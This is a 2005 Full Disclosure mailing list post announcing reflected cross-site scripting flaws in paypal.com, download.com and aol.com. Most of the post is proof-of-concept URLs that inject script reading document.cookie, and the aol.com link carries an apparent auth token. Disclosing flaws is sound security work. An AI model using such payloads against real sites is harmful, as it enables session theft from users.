Full Disclosure mailing list archives

Big Sites That Are Vulnerable To XSS

From: tuytumadre () att net
Date: Thu, 21 Apr 2005 04:19:58 +0000

The following have been previously reposibly disclosed, and, because of the lack of action taken on the venders' parts, 
full disclosure is necessary to elliminate the threat of what's called "security by obscurity."

paypal.com
http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/accounts-outside--><script>alert(document.cookie)</script><!--

download.com
http://www.download.com/2001-20_4-0.html?tag=tabasdf"--><script>alert(document.cookie)</script><!--

aol.com*
https://my.screenname.aol.com/snsHomePage.psp?hpClickedOn=null&sitedomain=my.screenname.aol.com";}%20{%20alert(document.cookie);%20//&authLev=2&siteState=&isSiteStateEncoded=false&lang=en&locale=us&mcAuth=%2FBcAG0Jd4zsAAK80AY99uEJd43cIgAwNtLp%2BJCQAAA%3D%3D

*on aol.com, the victim must be logged in to the website screenname service to be vulnerable.

Regards,
Paul
Greyhats Security
http://greyhatsecurity.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Big Sites That Are Vulnerable To XSS tuytumadre (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Morning Wood (Apr 20)
- Re: Big Sites That Are Vulnerable To XSS Jerome ATHIAS (Apr 21)
  - Re: Big Sites That Are Vulnerable To XSS Dominik Birk (Apr 27)